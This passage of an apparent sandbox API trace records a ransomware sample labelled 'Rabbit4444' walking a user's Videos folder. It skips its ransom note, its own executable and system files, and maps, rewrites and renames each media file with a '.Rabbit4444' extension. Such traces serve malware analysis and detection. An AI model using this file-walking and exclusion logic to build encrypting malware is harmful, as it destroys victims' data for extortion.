lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.257] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.257] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.257] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb30affb0, ftCreationTime.dwHighDateTime=0x1d4cf9b, ftLastAccessTime.dwLowDateTime=0xa2f74ac0, ftLastAccessTime.dwHighDateTime=0x1d4c94c, ftLastWriteTime.dwLowDateTime=0xe615fffc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.257] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.257] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.257] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.257] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.257] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.257] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe615fffc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe615fffc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe615fffc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.257] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.257] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.257] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334da2c0, ftCreationTime.dwHighDateTime=0x1d4c828, ftLastAccessTime.dwLowDateTime=0x26630630, ftLastAccessTime.dwHighDateTime=0x1d4c5ea, ftLastWriteTime.dwLowDateTime=0x26630630, ftLastWriteTime.dwHighDateTime=0x1d4c5ea, nFileSizeHigh=0x0, nFileSizeLow=0xe06f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hafWBqXU o.swf", cAlternateFileName="HAFWBQ~1.SWF")) returned 1 [0048.257] lstrcmpiW (lpString1="hafWBqXU o.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.257] lstrcmpiW (lpString1="hafWBqXU o.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.257] lstrcmpiW (lpString1="hafWBqXU o.swf", lpString2="Rabbit4444.exe") returned -1 [0048.257] lstrcmpiW (lpString1="hafWBqXU o.swf", lpString2=".") returned 1 [0048.258] lstrcmpiW (lpString1="hafWBqXU o.swf", lpString2="..") returned 1 [0048.258] lstrcmpiW (lpString1="hafWBqXU o.swf", lpString2="windows") returned -1 [0048.258] lstrcmpiW (lpString1="hafWBqXU o.swf", lpString2="bootmgr") returned 1 [0048.258] lstrcmpiW (lpString1="hafWBqXU o.swf", lpString2="pagefile.sys") returned -1 [0048.258] lstrcmpiW (lpString1="hafWBqXU o.swf", lpString2="boot") returned 1 [0048.258] lstrcmpiW (lpString1="hafWBqXU o.swf", lpString2="ids.txt") returned -1 [0048.258] lstrcmpiW (lpString1="hafWBqXU o.swf", lpString2="NTUSER.DAT") returned -1 [0048.258] lstrcpyW (in: lpString1=0x130eb6e, lpString2="hafWBqXU o.swf" | out: lpString1="hafWBqXU o.swf") returned="hafWBqXU o.swf" [0048.258] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\hafWBqXU o.swf", dwFileAttributes=0x0) returned 1 [0048.258] lstrlenW (lpString="hafWBqXU o.swf") returned 14 [0048.258] lstrlenW (lpString="Rabbit4444") returned 10 [0048.258] lstrcmpiW (lpString1="BqXU o.swf", lpString2="Rabbit4444") returned -1 [0048.258] lstrlenW (lpString=".dll") returned 4 [0048.258] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0048.258] lstrlenW (lpString=".lnk") returned 4 [0048.258] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0048.258] lstrlenW (lpString=".ini") returned 4 [0048.258] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0048.258] lstrlenW (lpString=".sys") returned 4 [0048.258] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0048.258] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\hafWBqXU o.swf" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\hafwbqxu o.swf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.258] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.258] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13956920054) returned 1 [0048.258] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=57455) returned 1 [0048.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0048.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0048.259] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe370, lpName=0x0) returned 0x298 [0048.259] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe370) returned 0x70000 [0048.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0048.260] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0048.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0048.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0048.261] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13957147146) returned 1 [0048.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0048.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0048.261] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.261] CloseHandle (hObject=0x298) returned 1 [0048.262] CloseHandle (hObject=0x278) returned 1 [0048.264] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\tKr\\hafWBqXU o.swf.Rabbit4444") returned 52 [0048.264] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\hafWBqXU o.swf" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\hafwbqxu o.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\hafWBqXU o.swf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\hafwbqxu o.swf.rabbit4444"), dwFlags=0x1) returned 1 [0048.264] InterlockedExchangeAdd (in: Addend=0xff618, Value=57456 | out: Addend=0xff618) returned 15333312 [0048.264] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3311 [0048.264] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea2d7fa0, ftCreationTime.dwHighDateTime=0x1d4c5e5, ftLastAccessTime.dwLowDateTime=0xe15fa6d0, ftLastAccessTime.dwHighDateTime=0x1d4d217, ftLastWriteTime.dwLowDateTime=0xe15fa6d0, ftLastWriteTime.dwHighDateTime=0x1d4d217, nFileSizeHigh=0x0, nFileSizeLow=0x10517, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LgD6JoRdSVkauQ4AZ.mkv", cAlternateFileName="LGD6JO~1.MKV")) returned 1 [0048.264] lstrcmpiW (lpString1="LgD6JoRdSVkauQ4AZ.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.264] lstrcmpiW (lpString1="LgD6JoRdSVkauQ4AZ.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.264] lstrcmpiW (lpString1="LgD6JoRdSVkauQ4AZ.mkv", lpString2="Rabbit4444.exe") returned -1 [0048.264] lstrcmpiW (lpString1="LgD6JoRdSVkauQ4AZ.mkv", lpString2=".") returned 1 [0048.264] lstrcmpiW (lpString1="LgD6JoRdSVkauQ4AZ.mkv", lpString2="..") returned 1 [0048.264] lstrcmpiW (lpString1="LgD6JoRdSVkauQ4AZ.mkv", lpString2="windows") returned -1 [0048.265] lstrcmpiW (lpString1="LgD6JoRdSVkauQ4AZ.mkv", lpString2="bootmgr") returned 1 [0048.265] lstrcmpiW (lpString1="LgD6JoRdSVkauQ4AZ.mkv", lpString2="pagefile.sys") returned -1 [0048.265] lstrcmpiW (lpString1="LgD6JoRdSVkauQ4AZ.mkv", lpString2="boot") returned 1 [0048.265] lstrcmpiW (lpString1="LgD6JoRdSVkauQ4AZ.mkv", lpString2="ids.txt") returned 1 [0048.265] lstrcmpiW (lpString1="LgD6JoRdSVkauQ4AZ.mkv", lpString2="NTUSER.DAT") returned -1 [0048.265] lstrcpyW (in: lpString1=0x130eb6e, lpString2="LgD6JoRdSVkauQ4AZ.mkv" | out: lpString1="LgD6JoRdSVkauQ4AZ.mkv") returned="LgD6JoRdSVkauQ4AZ.mkv" [0048.265] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\LgD6JoRdSVkauQ4AZ.mkv", dwFileAttributes=0x0) returned 1 [0048.265] lstrlenW (lpString="LgD6JoRdSVkauQ4AZ.mkv") returned 21 [0048.265] lstrlenW (lpString="Rabbit4444") returned 10 [0048.265] lstrcmpiW (lpString1="auQ4AZ.mkv", lpString2="Rabbit4444") returned -1 [0048.265] lstrlenW (lpString=".dll") returned 4 [0048.265] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0048.265] lstrlenW (lpString=".lnk") returned 4 [0048.265] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0048.265] lstrlenW (lpString=".ini") returned 4 [0048.265] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0048.265] lstrlenW (lpString=".sys") returned 4 [0048.265] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0048.265] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\LgD6JoRdSVkauQ4AZ.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\lgd6jordsvkauq4az.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.265] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.265] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13957616200) returned 1 [0048.265] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=66839) returned 1 [0048.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0048.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0048.266] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10820, lpName=0x0) returned 0x298 [0048.266] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10820) returned 0x70000 [0048.267] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.267] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0048.267] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.267] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0048.267] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0048.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0048.268] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13957856303) returned 1 [0048.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0048.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0048.268] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.269] CloseHandle (hObject=0x298) returned 1 [0048.269] CloseHandle (hObject=0x278) returned 1 [0048.271] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\tKr\\LgD6JoRdSVkauQ4AZ.mkv.Rabbit4444") returned 59 [0048.271] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\LgD6JoRdSVkauQ4AZ.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\lgd6jordsvkauq4az.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\LgD6JoRdSVkauQ4AZ.mkv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\lgd6jordsvkauq4az.mkv.rabbit4444"), dwFlags=0x1) returned 1 [0048.274] InterlockedExchangeAdd (in: Addend=0xff618, Value=66848 | out: Addend=0xff618) returned 15390768 [0048.274] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3313 [0048.274] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x390fac30, ftCreationTime.dwHighDateTime=0x1d4d070, ftLastAccessTime.dwLowDateTime=0x9ac4ce20, ftLastAccessTime.dwHighDateTime=0x1d4d33a, ftLastWriteTime.dwLowDateTime=0x9ac4ce20, ftLastWriteTime.dwHighDateTime=0x1d4d33a, nFileSizeHigh=0x0, nFileSizeLow=0x1652c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p_iTlT1Y7Bmx3OF.swf", cAlternateFileName="P_ITLT~1.SWF")) returned 1 [0048.275] lstrcmpiW (lpString1="p_iTlT1Y7Bmx3OF.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.275] lstrcmpiW (lpString1="p_iTlT1Y7Bmx3OF.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.275] lstrcmpiW (lpString1="p_iTlT1Y7Bmx3OF.swf", lpString2="Rabbit4444.exe") returned -1 [0048.275] lstrcmpiW (lpString1="p_iTlT1Y7Bmx3OF.swf", lpString2=".") returned 1 [0048.275] lstrcmpiW (lpString1="p_iTlT1Y7Bmx3OF.swf", lpString2="..") returned 1 [0048.275] lstrcmpiW (lpString1="p_iTlT1Y7Bmx3OF.swf", lpString2="windows") returned -1 [0048.275] lstrcmpiW (lpString1="p_iTlT1Y7Bmx3OF.swf", lpString2="bootmgr") returned 1 [0048.275] lstrcmpiW (lpString1="p_iTlT1Y7Bmx3OF.swf", lpString2="pagefile.sys") returned -1 [0048.275] lstrcmpiW (lpString1="p_iTlT1Y7Bmx3OF.swf", lpString2="boot") returned 1 [0048.275] lstrcmpiW (lpString1="p_iTlT1Y7Bmx3OF.swf", lpString2="ids.txt") returned 1 [0048.275] lstrcmpiW (lpString1="p_iTlT1Y7Bmx3OF.swf", lpString2="NTUSER.DAT") returned 1 [0048.275] lstrcpyW (in: lpString1=0x130eb6e, lpString2="p_iTlT1Y7Bmx3OF.swf" | out: lpString1="p_iTlT1Y7Bmx3OF.swf") returned="p_iTlT1Y7Bmx3OF.swf" [0048.275] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\p_iTlT1Y7Bmx3OF.swf", dwFileAttributes=0x0) returned 1 [0048.275] lstrlenW (lpString="p_iTlT1Y7Bmx3OF.swf") returned 19 [0048.275] lstrlenW (lpString="Rabbit4444") returned 10 [0048.275] lstrcmpiW (lpString1="Bmx3OF.swf", lpString2="Rabbit4444") returned -1 [0048.275] lstrlenW (lpString=".dll") returned 4 [0048.275] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0048.275] lstrlenW (lpString=".lnk") returned 4 [0048.275] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0048.275] lstrlenW (lpString=".ini") returned 4 [0048.275] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0048.275] lstrlenW (lpString=".sys") returned 4 [0048.275] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0048.275] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\p_iTlT1Y7Bmx3OF.swf" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\p_itlt1y7bmx3of.swf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.275] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.276] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13958627725) returned 1 [0048.276] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=91436) returned 1 [0048.276] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0048.276] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0048.276] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16830, lpName=0x0) returned 0x298 [0048.276] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16830) returned 0x70000 [0048.278] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.278] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0048.278] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.278] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.278] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.278] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.278] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.278] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0048.278] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13958915925) returned 1 [0048.278] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0048.278] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0048.279] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.280] CloseHandle (hObject=0x298) returned 1 [0048.280] CloseHandle (hObject=0x278) returned 1 [0048.282] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\tKr\\p_iTlT1Y7Bmx3OF.swf.Rabbit4444") returned 57 [0048.282] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\p_iTlT1Y7Bmx3OF.swf" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\p_itlt1y7bmx3of.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\p_iTlT1Y7Bmx3OF.swf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\p_itlt1y7bmx3of.swf.rabbit4444"), dwFlags=0x1) returned 1 [0048.283] InterlockedExchangeAdd (in: Addend=0xff618, Value=91440 | out: Addend=0xff618) returned 15457616 [0048.283] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3315 [0048.283] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3795510, ftCreationTime.dwHighDateTime=0x1d4c825, ftLastAccessTime.dwLowDateTime=0x8bd3de0, ftLastAccessTime.dwHighDateTime=0x1d4d255, ftLastWriteTime.dwLowDateTime=0x8bd3de0, ftLastWriteTime.dwHighDateTime=0x1d4d255, nFileSizeHigh=0x0, nFileSizeLow=0x165c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SOffZObMNcI-W_M.mkv", cAlternateFileName="SOFFZO~1.MKV")) returned 1 [0048.283] lstrcmpiW (lpString1="SOffZObMNcI-W_M.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.283] lstrcmpiW (lpString1="SOffZObMNcI-W_M.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.283] lstrcmpiW (lpString1="SOffZObMNcI-W_M.mkv", lpString2="Rabbit4444.exe") returned 1 [0048.283] lstrcmpiW (lpString1="SOffZObMNcI-W_M.mkv", lpString2=".") returned 1 [0048.283] lstrcmpiW (lpString1="SOffZObMNcI-W_M.mkv", lpString2="..") returned 1 [0048.283] lstrcmpiW (lpString1="SOffZObMNcI-W_M.mkv", lpString2="windows") returned -1 [0048.283] lstrcmpiW (lpString1="SOffZObMNcI-W_M.mkv", lpString2="bootmgr") returned 1 [0048.283] lstrcmpiW (lpString1="SOffZObMNcI-W_M.mkv", lpString2="pagefile.sys") returned 1 [0048.283] lstrcmpiW (lpString1="SOffZObMNcI-W_M.mkv", lpString2="boot") returned 1 [0048.283] lstrcmpiW (lpString1="SOffZObMNcI-W_M.mkv", lpString2="ids.txt") returned 1 [0048.283] lstrcmpiW (lpString1="SOffZObMNcI-W_M.mkv", lpString2="NTUSER.DAT") returned 1 [0048.283] lstrcpyW (in: lpString1=0x130eb6e, lpString2="SOffZObMNcI-W_M.mkv" | out: lpString1="SOffZObMNcI-W_M.mkv") returned="SOffZObMNcI-W_M.mkv" [0048.283] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\SOffZObMNcI-W_M.mkv", dwFileAttributes=0x0) returned 1 [0048.283] lstrlenW (lpString="SOffZObMNcI-W_M.mkv") returned 19 [0048.283] lstrlenW (lpString="Rabbit4444") returned 10 [0048.284] lstrcmpiW (lpString1="cI-W_M.mkv", lpString2="Rabbit4444") returned -1 [0048.284] lstrlenW (lpString=".dll") returned 4 [0048.284] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0048.284] lstrlenW (lpString=".lnk") returned 4 [0048.284] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0048.284] lstrlenW (lpString=".ini") returned 4 [0048.284] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0048.284] lstrlenW (lpString=".sys") returned 4 [0048.284] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0048.284] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\SOffZObMNcI-W_M.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\soffzobmnci-w_m.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.284] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.284] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13959465522) returned 1 [0048.284] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=91584) returned 1 [0048.284] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0048.284] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0048.284] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x168c0, lpName=0x0) returned 0x298 [0048.284] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x168c0) returned 0x70000 [0048.286] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.286] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.286] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.286] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.286] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.287] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13959752696) returned 1 [0048.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0048.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0048.287] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.288] CloseHandle (hObject=0x298) returned 1 [0048.288] CloseHandle (hObject=0x278) returned 1 [0048.291] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\tKr\\SOffZObMNcI-W_M.mkv.Rabbit4444") returned 57 [0048.291] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\SOffZObMNcI-W_M.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\soffzobmnci-w_m.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\SOffZObMNcI-W_M.mkv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\soffzobmnci-w_m.mkv.rabbit4444"), dwFlags=0x1) returned 1 [0048.291] InterlockedExchangeAdd (in: Addend=0xff618, Value=91584 | out: Addend=0xff618) returned 15549056 [0048.291] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3317 [0048.291] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: 